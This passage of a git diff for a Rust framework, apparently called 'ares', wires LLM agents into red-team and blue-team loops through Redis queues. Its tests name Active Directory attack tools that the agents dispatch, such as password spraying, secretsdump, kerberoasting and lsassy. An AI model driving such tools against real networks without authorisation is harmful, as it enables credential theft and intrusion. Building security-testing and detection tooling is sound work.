+    pub(super) operation_id: String,
+    pub(super) auth_throttle: AuthThrottle,
+}
+
+impl RedisToolDispatcher {
+    pub fn new(queue: TaskQueue, operation_id: String, auth_throttle: AuthThrottle) -> Self {
+        Self {
+            queue,
+            tool_timeout: std::time::Duration::from_secs(super::DEFAULT_TOOL_TIMEOUT_SECS),
+            operation_id,
+            auth_throttle,
+        }
+    }
+}
+
+#[async_trait::async_trait]
+impl ares_llm::ToolDispatcher for RedisToolDispatcher {
+    async fn dispatch_tool(
+        &self,
+        role: &str,
+        task_id: &str,
+        call: &ToolCall,
+    ) -> Result<ToolExecResult> {
+        let effective_role = super::resolve_queue_role(role, &call.name);
+        let span = producer_span(
+            &format!("dispatch.{}", call.name),
+            role,
+            Team::Red,
+            &format!("ares-worker-{effective_role}"),
+        );
+
+        async {
+            // Rate-limit auth-bearing tools to prevent AD account lockout
+            if let Some(cred_key) = extract_credential_key(call) {
+                self.auth_throttle.acquire(&cred_key).await;
+            }
+
+            let call_id = format!("{}_{}", call.name, uuid::Uuid::new_v4().simple());
+
+            // Inject trace context for cross-service span linking
+            let traceparent = inject_traceparent(&tracing::Span::current());
+
+            let request = ToolExecRequest {
+                call_id: call_id.clone(),
+                task_id: task_id.to_string(),
+                tool_name: call.name.clone(),
+                arguments: call.arguments.clone(),
+                traceparent,
+                operation_id: Some(self.operation_id.clone()),
+            };
+
+            let queue_key = format!("{TOOL_EXEC_PREFIX}:{effective_role}");
+            let result_key = format!("{TOOL_RESULT_PREFIX}:{call_id}");
+            let payload =
+                serde_json::to_string(&request).context("Failed to serialize tool exec request")?;
+
+            debug!(
+                tool = %call.name,
+                call_id = %call_id,
+                queue = %queue_key,
+                effective_role = %effective_role,
+                "Dispatching tool call to worker"
+            );
+
+            // Push request to worker queue
+            let mut conn = self.queue.connection();
+            conn.lpush::<_, _, ()>(&queue_key, &payload)
+                .await
+                .context("Failed to push tool exec request to Redis")?;
+
+            // Wait for result with timeout
+            let timeout_secs = self.tool_timeout.as_secs().max(1) as f64;
+            let brpop_result: Option<(String, String)> = redis::cmd("BRPOP")
+                .arg(&result_key)
+                .arg(timeout_secs)
+                .query_async(&mut conn)
+                .await
+                .context("BRPOP failed for tool result")?;
+
+            match brpop_result {
+                Some((_key, value)) => {
+                    let response: ToolExecResponse = serde_json::from_str(&value)
+                        .context("Failed to deserialize tool exec response")?;
+
+                    debug!(
+                        tool = %call.name,
+                        call_id = %call_id,
+                        has_error = response.error.is_some(),
+                        "Tool result received"
+                    );
+
+                    // Push discoveries to the real-time discovery list so
+                    // the discovery poller publishes them to state immediately,
+                    // independent of the task result consumer.
+ if let Some(ref disc) = response.discoveries { + push_realtime_discoveries( + &self.queue, + &self.operation_id, + disc, + &call.name, + &call.arguments, + ) + .await; + } + + Ok(ToolExecResult { + output: response.output, + error: response.error, + discoveries: response.discoveries, + }) + } + None => { + warn!( + tool = %call.name, + call_id = %call_id, + timeout_secs = timeout_secs, + "Tool execution timed out" + ); + + // Clean up any late result + let _: Result<(), _> = conn + .expire::<_, ()>(&result_key, RESULT_TTL_SECS as i64) + .await; + + Ok(ToolExecResult { + output: String::new(), + error: Some(format!( + "Tool '{}' timed out after {timeout_secs}s", + call.name + )), + discoveries: None, + }) + } + } + } + .instrument(span) + .await + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/tests.rs b/ares-cli/src/orchestrator/tool_dispatcher/tests.rs new file mode 100644 index 00000000..00d9940a --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/tests.rs @@ -0,0 +1,98 @@ +use super::*; + +#[test] +fn test_tool_exec_request_serialization() { + let req = ToolExecRequest { + call_id: "nmap_scan_abc123".into(), + task_id: "recon_def456".into(), + tool_name: "nmap_scan".into(), + arguments: serde_json::json!({"target": "192.168.58.0/24"}), + traceparent: None, + operation_id: Some("op-20260415-120000".into()), + }; + + let json = serde_json::to_string(&req).unwrap(); + let parsed: ToolExecRequest = serde_json::from_str(&json).unwrap(); + assert_eq!(parsed.call_id, "nmap_scan_abc123"); + assert_eq!(parsed.tool_name, "nmap_scan"); +} + +#[test] +fn test_tool_exec_response_deserialization() { + let json = r#"{"call_id":"nmap_scan_abc","output":"Found 5 hosts","error":null}"#; + let resp: ToolExecResponse = serde_json::from_str(json).unwrap(); + assert_eq!(resp.output, "Found 5 hosts"); + assert!(resp.error.is_none()); +} + +#[test] +fn test_tool_exec_response_with_error() { + let json = r#"{"call_id":"x","output":"","error":"Connection refused"}"#; + let resp: ToolExecResponse = serde_json::from_str(json).unwrap(); + assert_eq!(resp.error.as_deref(), Some("Connection refused")); +} + +#[test] +fn test_cross_role_routing_netexec_tools() { + // Netexec tools called from credential_access should route to recon + assert_eq!( + resolve_queue_role("credential_access", "password_spray"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "username_as_password"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "ldap_search_descriptions"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "gpp_password_finder"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "sysvol_script_search"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "laps_dump"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "smbclient_spider"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "password_policy"), + "recon" + ); +} + +#[test] +fn test_cross_role_routing_native_tools_stay() { + // Tools native to credential_access should stay on credential_access + assert_eq!( + resolve_queue_role("credential_access", "secretsdump"), + "credential_access" + ); + assert_eq!( + resolve_queue_role("credential_access", "kerberoast"), + "credential_access" + ); + assert_eq!( + resolve_queue_role("credential_access", "lsassy"), + "credential_access" + ); +} + +#[test] +fn test_cross_role_routing_recon_stays_recon() { + // When recon itself calls these tools, they 
stay on recon
+    assert_eq!(resolve_queue_role("recon", "password_spray"), "recon");
+    assert_eq!(resolve_queue_role("recon", "nmap_scan"), "recon");
+    assert_eq!(
+        resolve_queue_role("recon", "ldap_search_descriptions"),
+        "recon"
+    );
+}
diff --git a/ares-cli/src/transport.rs b/ares-cli/src/transport.rs
index 4da441d5..42ba70ae 100644
--- a/ares-cli/src/transport.rs
+++ b/ares-cli/src/transport.rs
@@ -1,8 +1,8 @@
-//! K8s and EC2 transport: re-exec ares-cli commands via kubectl or SSM.
+//! K8s and EC2 transport: re-exec ares commands via kubectl or SSM.
 //!
 //! When `--k8s <pod>` is passed, this module strips the transport flags
 //! from argv and re-runs the command on the target pod. This eliminates ~25
-//! boilerplate Taskfile wrappers that just do `kubectl exec ... ares-cli ...`.
+//! boilerplate Taskfile wrappers that just do `kubectl exec ... ares ...`.
 //!
 //! When `--ec2 <name>` is passed, this module resolves the EC2 instance by
 //! Name tag and executes via AWS SSM send-command, polling for results.
@@ -167,7 +167,7 @@ pub(crate) fn maybe_exec_k8s() -> Option {
         "--",
         "env",
         "RUST_LOG=error",
-        "ares-cli",
+        "ares",
     ]);
     cmd.args(&inner_args);
@@ -393,7 +393,7 @@ pub(crate) fn maybe_exec_ec2() -> Option {
         }
     };
 
-    let cli_cmd = format!("RUST_LOG=error ares-cli {}", shell_join(&inner_args));
+    let cli_cmd = format!("RUST_LOG=error ares {}", shell_join(&inner_args));
 
     let cmd_id = match ssm_send_command(&instance_id, &cli_cmd, &profile, &region) {
         Ok(id) => id,
diff --git a/ares-cli/src/worker/blue_task_loop.rs b/ares-cli/src/worker/blue_task_loop.rs
new file mode 100644
index 00000000..8b992e24
--- /dev/null
+++ b/ares-cli/src/worker/blue_task_loop.rs
@@ -0,0 +1,385 @@
+//! Blue team task consumption loop.
+//!
+//! Consumes tasks from `ares:blue:tasks:global:{role}`, runs the blue
+//! team LLM agent loop with appropriate tools, and pushes results back
+//! to `ares:blue:results:{task_id}`.
+//!
+//! This parallels the red team `task_loop` but uses:
+//! - Blue task queue keys (`ares:blue:tasks:*`)
+//! - Blue tool definitions from `ares_llm::tool_registry::blue`
+//! - Blue prompt templates
+//! - Blue state writer for investigation state mutations
+//! - HTTP-based tools (Loki, Prometheus) instead of CLI wrappers
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use anyhow::Result;
+use tracing::{debug, error, info, warn};
+
+use ares_core::state::blue_task_queue::{BlueTaskMessage, BlueTaskQueue, BlueTaskResult};
+use ares_llm::tool_registry::blue::{self, BlueAgentRole};
+use ares_llm::{run_agent_loop, AgentLoopConfig, LlmProvider, LoopEndReason, ToolDispatcher};
+
+use crate::worker::config::WorkerConfig;
+use crate::worker::heartbeat::WorkerStatus;
+
+/// Run the blue team task consumption loop until shutdown.
+pub async fn run_blue_task_loop(
+    config: &WorkerConfig,
+    conn: redis::aio::ConnectionManager,
+    provider: Box<dyn LlmProvider>,
+    dispatcher: Arc<dyn ToolDispatcher>,
+    model_name: String,
+    status_tx: tokio::sync::watch::Sender<WorkerStatus>,
+    shutdown: Arc<tokio::sync::Notify>,
+) -> Result<()> {
+    let role = parse_blue_role(&config.worker_role);
+    let role_str = role.as_str();
+
+    info!(
+        role = role_str,
+        agent = %config.agent_name,
+        "Starting blue team task loop"
+    );
+
+    let mut task_queue = BlueTaskQueue::from_conn(conn);
+
+    let mut retry_delay = Duration::from_secs(1);
+    let max_retry_delay = Duration::from_secs(60);
+
+    loop {
+        let poll_result = tokio::select!
{ + result = task_queue.poll_global_task(role_str, config.poll_timeout.as_secs_f64()) => result, + _ = shutdown.notified() => { + info!("Blue task loop: shutdown signalled"); + return Ok(()); + } + }; + + match poll_result { + Ok(Some(task)) => { + retry_delay = Duration::from_secs(1); + + let _ = status_tx.send(WorkerStatus { + status: "busy".to_string(), + current_task: Some(task.task_id.clone()), + }); + + // Send blue team heartbeat + let _ = task_queue + .send_heartbeat( + &config.agent_name, + "busy", + Some(&task.task_id), + role_str, + Some(&task.investigation_id), + ) + .await; + + // Execute the blue team task + let result = execute_blue_task( + &task, + role, + provider.as_ref(), + Arc::clone(&dispatcher), + &model_name, + &config.agent_name, + ) + .await; + + // Push result + if let Err(e) = task_queue.send_result(&result).await { + error!( + task_id = %task.task_id, + err = %e, + "Failed to send blue task result" + ); + } + + let _ = status_tx.send(WorkerStatus { + status: "idle".to_string(), + current_task: None, + }); + + let _ = task_queue + .send_heartbeat( + &config.agent_name, + "idle", + None, + role_str, + Some(&task.investigation_id), + ) + .await; + } + Ok(None) => { + retry_delay = Duration::from_secs(1); + } + Err(e) => { + let error_str = e.to_string().to_lowercase(); + let is_conn_error = ["connection", "closed", "timeout", "broken", "reset"] + .iter() + .any(|kw| error_str.contains(kw)); + + if is_conn_error { + warn!( + delay_secs = retry_delay.as_secs(), + "Blue task loop: connection error, retrying: {e}" + ); + tokio::select! { + _ = tokio::time::sleep(retry_delay) => {} + _ = shutdown.notified() => return Ok(()), + } + retry_delay = (retry_delay * 2).min(max_retry_delay); + } else { + error!("Blue task loop: non-connection error: {e}"); + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(5)) => {} + _ = shutdown.notified() => return Ok(()), + } + retry_delay = Duration::from_secs(1); + } + } + } + } +} + +/// Execute a single blue team task through the LLM agent loop. 
+async fn execute_blue_task(
+    task: &BlueTaskMessage,
+    role: BlueAgentRole,
+    provider: &dyn LlmProvider,
+    dispatcher: Arc<dyn ToolDispatcher>,
+    model_name: &str,
+    agent_name: &str,
+) -> BlueTaskResult {
+    info!(
+        task_id = %task.task_id,
+        task_type = %task.task_type,
+        role = role.as_str(),
+        investigation_id = %task.investigation_id,
+        "Executing blue team task"
+    );
+
+    // Build tools for this role
+    let tools = blue::blue_tools_for_role(role);
+    let capabilities: Vec<String> = tools
+        .iter()
+        .filter(|t| !blue::is_blue_callback_tool(&t.name))
+        .map(|t| t.name.clone())
+        .collect();
+
+    // Build system prompt
+    let system_prompt =
+        match ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities) {
+            Ok(p) => p,
+            Err(e) => {
+                return BlueTaskResult::failure(
+                    &task.task_id,
+                    &task.investigation_id,
+                    format!("Failed to build system prompt: {e}"),
+                    agent_name,
+                );
+            }
+        };
+
+    // Build task prompt
+    // Investigation state summary: currently a static placeholder — loading
+    // the real summary from investigation state remains best-effort.
+    let state_summary = "Investigation in progress.".to_string();
+
+    let task_prompt = match ares_llm::prompt::blue::generate_blue_task_prompt(
+        &task.task_type,
+        &task.task_id,
+        &task.params,
+        &state_summary,
+    ) {
+        Some(p) => p,
+        None => {
+            // Fallback: use raw params as prompt
+            format!(
+                "## Task: {}\n\nType: {}\nInvestigation: {}\n\nParameters:\n```json\n{}\n```\n\n\
+                 Complete this task and call the appropriate completion callback.",
+                task.task_id,
+                task.task_type,
+                task.investigation_id,
+                serde_json::to_string_pretty(&task.params).unwrap_or_default()
+            )
+        }
+    };
+
+    let config = AgentLoopConfig {
+        model: model_name.to_string(),
+        max_steps: 50,
+        max_tool_calls_per_name: 25,
+        ..AgentLoopConfig::default()
+    };
+
+    // Run the agent loop
+    let outcome = run_agent_loop(
+        provider,
+        dispatcher,
+        &config,
+        &system_prompt,
+        &task_prompt,
+        role.as_str(),
+        &task.task_id,
+        &tools,
+        None, // No custom callback handler for worker tasks
+    )
+    .await;
+
+    // Convert outcome to BlueTaskResult
+    match &outcome.reason {
+        LoopEndReason::TaskComplete { result, .. } => {
+            info!(
+                task_id = %task.task_id,
+                steps = outcome.steps,
+                tool_calls = outcome.tool_calls_dispatched,
+                "Blue task completed"
+            );
+            BlueTaskResult::success(
+                &task.task_id,
+                &task.investigation_id,
+                serde_json::json!({
+                    "summary": result,
+                    "steps": outcome.steps,
+                    "tool_calls": outcome.tool_calls_dispatched,
+                }),
+                agent_name,
+            )
+        }
+        LoopEndReason::EndTurn { content } => BlueTaskResult::success(
+            &task.task_id,
+            &task.investigation_id,
+            serde_json::json!({
+                "summary": content,
+                "steps": outcome.steps,
+            }),
+            agent_name,
+        ),
+        LoopEndReason::RequestAssistance { issue, context } => BlueTaskResult::failure(
+            &task.task_id,
+            &task.investigation_id,
+            format!("Assistance needed: {issue} (context: {context})"),
+            agent_name,
+        ),
+        LoopEndReason::MaxSteps => {
+            warn!(task_id = %task.task_id, steps = outcome.steps, "Blue task hit max steps");
+            BlueTaskResult::failure(
+                &task.task_id,
+                &task.investigation_id,
+                format!("Hit max steps ({})", outcome.steps),
+                agent_name,
+            )
+        }
+        LoopEndReason::MaxTokens => BlueTaskResult::failure(
+            &task.task_id,
+            &task.investigation_id,
+            "Hit max tokens".into(),
+            agent_name,
+        ),
+        LoopEndReason::Error(err) => {
+            error!(task_id = %task.task_id, err = %err, "Blue task error");
+            BlueTaskResult::failure(
+                &task.task_id,
+                &task.investigation_id,
+                err.clone(),
+                agent_name,
+            )
+        }
+    }
+}
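+
+// Outcome → result mapping (sketch): `TaskComplete` and `EndTurn` become
+// `BlueTaskResult::success` with a payload like {"summary": ..., "steps": N};
+// `RequestAssistance`, `MaxSteps`, `MaxTokens`, and `Error` all become
+// `BlueTaskResult::failure` with a human-readable reason.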
+
+/// Parse a worker role string into a BlueAgentRole.
+fn parse_blue_role(role: &str) -> BlueAgentRole {
+    match role {
+        "triage" => BlueAgentRole::Triage,
+        "threat_hunter" => BlueAgentRole::ThreatHunter,
+        "lateral_analyst" => BlueAgentRole::LateralAnalyst,
+        "escalation_triage" => BlueAgentRole::EscalationTriage,
+        "blue_orchestrator" => BlueAgentRole::Orchestrator,
+        _ => {
+            warn!(role = role, "Unknown blue team role, defaulting to Triage");
+            BlueAgentRole::Triage
+        }
+    }
+}
+
+/// Blue team tool dispatcher that handles HTTP-based tools locally.
+///
+/// Blue team tools (Loki, Prometheus, detection queries) are HTTP-based
+/// and don't need worker dispatch — they run in-process.
+pub struct BlueLocalToolDispatcher;
+
+impl BlueLocalToolDispatcher {
+    pub fn new() -> Self {
+        Self
+    }
+}
+
+#[async_trait::async_trait]
+impl ToolDispatcher for BlueLocalToolDispatcher {
+    async fn dispatch_tool(
+        &self,
+        _role: &str,
+        _task_id: &str,
+        call: &ares_llm::ToolCall,
+    ) -> Result<ares_llm::ToolExecResult> {
+        debug!(tool = %call.name, "Executing blue team tool locally");
+
+        // Check if this is a blue team HTTP tool
+        if ares_tools::blue::is_blue_tool(&call.name) {
+            match ares_tools::blue::dispatch_blue(&call.name, &call.arguments).await {
+                Ok(output) => {
+                    let error = if output.success {
+                        None
+                    } else {
+                        Some(output.stderr.clone())
+                    };
+                    Ok(ares_llm::ToolExecResult {
+                        output: output.stdout,
+                        error,
+                        discoveries: None,
+                    })
+                }
+                Err(e) => Ok(ares_llm::ToolExecResult {
+                    output: String::new(),
+                    error: Some(e.to_string()),
+                    discoveries: None,
+                }),
+            }
+        } else {
+            // Unknown tool
+            Ok(ares_llm::ToolExecResult {
+                output: String::new(),
+                error: Some(format!("Unknown blue team tool: {}", call.name)),
+                discoveries: None,
+            })
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn test_parse_blue_role() {
+        assert_eq!(parse_blue_role("triage").as_str(), "triage");
+        assert_eq!(parse_blue_role("threat_hunter").as_str(), "threat_hunter");
+        assert_eq!(
+            parse_blue_role("lateral_analyst").as_str(),
+            "lateral_analyst"
+        );
+        assert_eq!(
+            parse_blue_role("escalation_triage").as_str(),
+            "escalation_triage"
+        );
+        assert_eq!(
+            parse_blue_role("blue_orchestrator").as_str(),
+            "blue_orchestrator"
+        );
+        // Unknown defaults to triage
+        assert_eq!(parse_blue_role("unknown").as_str(), "triage");
+    }
+}
diff --git a/ares-cli/src/worker/config.rs b/ares-cli/src/worker/config.rs
new file mode 100644
index 00000000..d3816b1a
--- /dev/null
+++ b/ares-cli/src/worker/config.rs
@@ -0,0 +1,199 @@
+//! Worker configuration from environment variables.
+//!
+//! Maps to the Python config module's `get_redis_url()`, `get_agent_task_timeout()`,
+//! and worker-specific env vars used in `_worker.py`.
+
+use std::env;
+use std::time::Duration;
+
+/// Worker execution mode.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum WorkerMode {
+    /// Full task execution: consume from `ares:tasks:{role}`, expand composite
+    /// tasks, run tools, push results. This is the default mode used when
+    /// Python workers or standalone Rust workers handle entire tasks.
+    Task,
+
+    /// Thin tool executor: consume individual tool calls from
+    /// `ares:tool_exec:{role}`, dispatch via `ares_tools::dispatch()`, push
+    /// results to `ares:tool_results:{call_id}`. Used when the Rust
+    /// orchestrator drives the LLM agent loop (ARES_LLM_MODEL).
+    ToolExec,
+
+    /// Blue team task execution: consume from `ares:blue:tasks:global:{role}`,
+    /// run the blue team LLM agent loop with HTTP-based tools (Loki,
+    /// Prometheus, detection queries), push results to `ares:blue:results:{task_id}`.
+    #[cfg(feature = "blue")]
+    BlueTask,
+}
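+
+// Mode selection (sketch) — mirrors the `ARES_WORKER_MODE` match in
+// `WorkerConfig::from_env` below:
+//   unset / anything else -> WorkerMode::Task
+//   "tool_exec"           -> WorkerMode::ToolExec
+//   "blue_task"           -> WorkerMode::BlueTask (requires the "blue" feature)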
+
+/// Worker configuration parsed from environment variables.
+#[derive(Debug, Clone)]
+pub struct WorkerConfig {
+    /// Redis connection URL (ARES_REDIS_URL).
+    pub redis_url: String,
+
+    /// Worker role matching `AgentRole` values: credential_access, cracker, lateral, acl, privesc, coercion.
+    pub worker_role: String,
+
+    /// Kubernetes pod name (HOSTNAME fallback).
+    pub pod_name: String,
+
+    /// Logical agent name derived from role (e.g., "ares-lateral-agent").
+    pub agent_name: String,
+
+    /// Active operation ID, if known at startup.
+    pub operation_id: Option<String>,
+
+    /// Worker mode: "task" (default) or "tool_exec" (ARES_WORKER_MODE).
+    pub mode: WorkerMode,
+
+    /// Maximum time for a single LLM agent task before kill (ARES_AGENT_TASK_TIMEOUT).
+    /// Default: 600 seconds.
+    pub task_timeout: Duration,
+
+    /// Heartbeat interval — how often we refresh `ares:heartbeat:{agent}`.
+    /// Default: 15 seconds.
+    pub heartbeat_interval: Duration,
+
+    /// Heartbeat TTL in Redis. Must be > heartbeat_interval.
+    /// Default: 60 seconds (matches Python's HEARTBEAT_TTL).
+    pub heartbeat_ttl: Duration,
+
+    /// BLPOP timeout for polling the task queue.
+    /// Default: 5 seconds (matches Python's poll_task default).
+    pub poll_timeout: Duration,
+}
+
+impl WorkerConfig {
+    /// Parse configuration from environment variables.
+    ///
+    /// Required:
+    /// - `ARES_REDIS_URL` — Redis connection string
+    /// - `ARES_WORKER_ROLE` — Worker role (credential_access, cracker, lateral, acl, privesc, coercion)
+    ///
+    /// Optional:
+    /// - `ARES_POD_NAME` / `HOSTNAME` — Pod name (default: "unknown")
+    /// - `ARES_OPERATION_ID` — Active operation ID
+    /// - `ARES_WORKER_MODE` — "task" (default) or "tool_exec"
+    /// - `ARES_AGENT_TASK_TIMEOUT` — Task timeout in seconds (default: 600)
+    /// - `ARES_HEARTBEAT_INTERVAL` — Heartbeat interval in seconds (default: 15)
+    /// - `ARES_HEARTBEAT_TTL` — Heartbeat TTL in seconds (default: 60)
+    /// - `ARES_POLL_TIMEOUT` — BLPOP timeout in seconds (default: 5)
+    pub fn from_env() -> anyhow::Result<Self> {
+        let redis_url = env::var("ARES_REDIS_URL")
+            .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL is required"))?;
+
+        let worker_role = env::var("ARES_WORKER_ROLE")
+            .map_err(|_| anyhow::anyhow!("ARES_WORKER_ROLE is required"))?;
+
+        let pod_name = env::var("ARES_POD_NAME")
+            .or_else(|_| env::var("HOSTNAME"))
+            .unwrap_or_else(|_| "unknown".to_string());
+
+        let agent_name = format!("ares-{}-agent", worker_role.replace('_', "-"));
+
+        let operation_id = env::var("ARES_OPERATION_ID").ok();
+
+        let mode = match env::var("ARES_WORKER_MODE").as_deref() {
+            Ok("tool_exec") => WorkerMode::ToolExec,
+            #[cfg(feature = "blue")]
+            Ok("blue_task") => WorkerMode::BlueTask,
+            _ => WorkerMode::Task,
+        };
+
+        let task_timeout = Duration::from_secs(
+            env::var("ARES_AGENT_TASK_TIMEOUT")
+                .ok()
+                .and_then(|v| v.parse::<u64>().ok())
+                .unwrap_or(600),
+        );
+
+        let heartbeat_interval = Duration::from_secs(
+            env::var("ARES_HEARTBEAT_INTERVAL")
+                .ok()
+                .and_then(|v| v.parse::<u64>().ok())
+                .unwrap_or(15),
+        );
+
+        let heartbeat_ttl = Duration::from_secs(
+            env::var("ARES_HEARTBEAT_TTL")
+                .ok()
+                .and_then(|v| v.parse::<u64>().ok())
+                .unwrap_or(60),
+        );
+
+        let poll_timeout = Duration::from_secs(
+            env::var("ARES_POLL_TIMEOUT")
+                .ok()
+                .and_then(|v| v.parse::<u64>().ok())
+                .unwrap_or(5),
+        );
+
+        Ok(Self {
+            redis_url,
+            worker_role,
+            pod_name,
+            agent_name,
+            operation_id,
+            mode,
+            task_timeout,
+            heartbeat_interval,
+            heartbeat_ttl,
+            poll_timeout,
+        })
+    }
+}
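+
+// Example (sketch): the minimal environment a tool-exec worker needs.
+// Values are illustrative, not shipped defaults.
+//
+//   ARES_REDIS_URL=redis://127.0.0.1:6379 \
+//   ARES_WORKER_ROLE=recon \
+//   ARES_WORKER_MODE=tool_exec \
+//   ares worker
+//
+// yields agent_name = "ares-recon-agent" and mode = WorkerMode::ToolExec.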
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    /// Combined test to avoid env var race conditions between parallel tests.
+    #[test]
+    fn from_env_all_scenarios() {
+        // Missing redis URL fails
+        std::env::remove_var("ARES_REDIS_URL");
+        std::env::set_var("ARES_WORKER_ROLE", "recon");
+        assert!(WorkerConfig::from_env().is_err());
+
+        // Missing role fails
+        std::env::set_var("ARES_REDIS_URL", "redis://localhost");
+        std::env::remove_var("ARES_WORKER_ROLE");
+        assert!(WorkerConfig::from_env().is_err());
+
+        // Defaults applied
+        std::env::set_var("ARES_WORKER_ROLE", "recon");
+        std::env::remove_var("ARES_WORKER_MODE");
+        let c = WorkerConfig::from_env().unwrap();
+        assert_eq!(c.task_timeout, Duration::from_secs(600));
+        assert_eq!(c.heartbeat_interval, Duration::from_secs(15));
+        assert_eq!(c.heartbeat_ttl, Duration::from_secs(60));
+        assert_eq!(c.poll_timeout, Duration::from_secs(5));
+        assert!(c.operation_id.is_none());
+        assert_eq!(c.mode, WorkerMode::Task);
+
+        // Worker mode: tool_exec
+        std::env::set_var("ARES_WORKER_MODE", "tool_exec");
+        let c = WorkerConfig::from_env().unwrap();
+        assert_eq!(c.mode, WorkerMode::ToolExec);
+
+        // Worker mode: blue_task
+        #[cfg(feature = "blue")]
+        {
+            std::env::set_var("ARES_WORKER_MODE", "blue_task");
+            let c = WorkerConfig::from_env().unwrap();
+            assert_eq!(c.mode, WorkerMode::BlueTask);
+            std::env::remove_var("ARES_WORKER_MODE");
+        }
+
+        // Agent name from role
+        std::env::set_var("ARES_WORKER_ROLE", "credential_access");
+        let c = WorkerConfig::from_env().unwrap();
+        assert_eq!(c.agent_name, "ares-credential-access-agent");
+        assert_eq!(c.worker_role, "credential_access");
+
+        std::env::remove_var("ARES_REDIS_URL");
+        std::env::remove_var("ARES_WORKER_ROLE");
+    }
+}
diff --git a/ares-cli/src/worker/heartbeat.rs b/ares-cli/src/worker/heartbeat.rs
new file mode 100644
index 00000000..cc3cf1e9
--- /dev/null
+++ b/ares-cli/src/worker/heartbeat.rs
@@ -0,0 +1,155 @@
+//! Background heartbeat task.
+//!
+//! Spawns a tokio task that periodically writes to `ares:heartbeat:{agent_name}`
+//! with a TTL, matching the Python `_threaded_heartbeat_loop` in `_worker.py`.
+//!
+//! The heartbeat runs independently of the GIL-bound task loop, ensuring the
+//! orchestrator always knows the worker is alive even during long Python calls.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use chrono::Utc;
+use redis::AsyncCommands;
+use tokio::sync::watch;
+use tokio::task::JoinHandle;
+use tracing::{debug, warn};
+
+/// Heartbeat key prefix — matches `RedisTaskQueue.HEARTBEAT_PREFIX` in Python.
+const HEARTBEAT_PREFIX: &str = "ares:heartbeat";
+
+/// Current worker status, shared between the task loop and heartbeat task.
+#[derive(Debug, Clone)]
+pub struct WorkerStatus {
+    /// "idle" or "busy"
+    pub status: String,
+    /// Current task ID if busy, None if idle.
+    pub current_task: Option<String>,
+}
+
+impl Default for WorkerStatus {
+    fn default() -> Self {
+        Self {
+            status: "idle".to_string(),
+            current_task: None,
+        }
+    }
+}
+
+/// Handle to the background heartbeat task. Drop to stop.
+pub struct HeartbeatHandle {
+    _handle: JoinHandle<()>,
+}
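+
+// Usage sketch (illustrative): a task loop flips the shared status around
+// each task via the watch channel returned by `spawn_heartbeat` below.
+//
+//   let _ = status_tx.send(WorkerStatus {
+//       status: "busy".to_string(),
+//       current_task: Some(task_id.clone()),
+//   });
+//   // ... run the task ...
+//   let _ = status_tx.send(WorkerStatus::default()); // back to "idle"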
+
+/// Spawn the background heartbeat loop.
+///
+/// Returns a `HeartbeatHandle` (drop it or abort to stop) and a `watch::Sender`
+/// the task loop uses to update current status.
+#[allow(clippy::too_many_arguments)]
+pub fn spawn_heartbeat(
+    conn: redis::aio::ConnectionManager,
+    agent_name: String,
+    pod_name: String,
+    role: String,
+    operation_id: Option<String>,
+    interval: Duration,
+    ttl: Duration,
+    shutdown: Arc<tokio::sync::Notify>,
+) -> (HeartbeatHandle, watch::Sender<WorkerStatus>) {
+    let (status_tx, status_rx) = watch::channel(WorkerStatus::default());
+
+    let handle = tokio::spawn(heartbeat_loop(
+        conn,
+        agent_name,
+        pod_name,
+        role,
+        operation_id,
+        interval,
+        ttl,
+        status_rx,
+        shutdown,
+    ));
+
+    (HeartbeatHandle { _handle: handle }, status_tx)
+}
+
+#[allow(clippy::too_many_arguments)]
+async fn heartbeat_loop(
+    mut conn: redis::aio::ConnectionManager,
+    agent_name: String,
+    pod_name: String,
+    role: String,
+    operation_id: Option<String>,
+    interval: Duration,
+    ttl: Duration,
+    status_rx: watch::Receiver<WorkerStatus>,
+    shutdown: Arc<tokio::sync::Notify>,
+) {
+    let heartbeat_key = format!("{HEARTBEAT_PREFIX}:{agent_name}");
+    let ttl_secs = ttl.as_secs() as i64;
+
+    debug!("Heartbeat: writing to {heartbeat_key} every {interval:?}");
+
+    let mut ticker = tokio::time::interval(interval);
+    ticker.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = ticker.tick() => {}
+            _ = shutdown.notified() => {
+                // Send a final "offline" heartbeat before exiting
+                let data = build_heartbeat_json("offline", None, &pod_name, &role, &operation_id);
+                let _: Result<(), _> = redis::cmd("SET")
+                    .arg(&heartbeat_key)
+                    .arg(&data)
+                    .arg("EX")
+                    .arg(ttl_secs)
+                    .query_async(&mut conn)
+                    .await;
+                debug!("Heartbeat: shutdown, sent offline heartbeat");
+                return;
+            }
+        }
+
+        let status = status_rx.borrow().clone();
+        let data = build_heartbeat_json(
+            &status.status,
+            status.current_task.as_deref(),
+            &pod_name,
+            &role,
+            &operation_id,
+        );
+
+        match conn
+            .set_ex::<_, _, ()>(&heartbeat_key, &data, ttl_secs as u64)
+            .await
+        {
+            Ok(()) => {
+                debug!("Heartbeat: {agent_name} -> {}", status.status);
+            }
+            Err(e) => {
+                // ConnectionManager auto-reconnects on next use
+                warn!("Heartbeat: Redis write failed: {e}");
+            }
+        }
+    }
+}
+
+/// Build the heartbeat JSON payload matching Python's `send_heartbeat`.
+fn build_heartbeat_json(
+    status: &str,
+    current_task: Option<&str>,
+    pod_name: &str,
+    role: &str,
+    operation_id: &Option<String>,
+) -> String {
+    serde_json::json!({
+        "status": status,
+        "current_task": current_task,
+        "pod_name": pod_name,
+        "role": role,
+        "operation_id": operation_id,
+        "timestamp": Utc::now().to_rfc3339(),
+    })
+    .to_string()
+}
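+
+// Example payload (sketch; values illustrative, fields match
+// `build_heartbeat_json` above):
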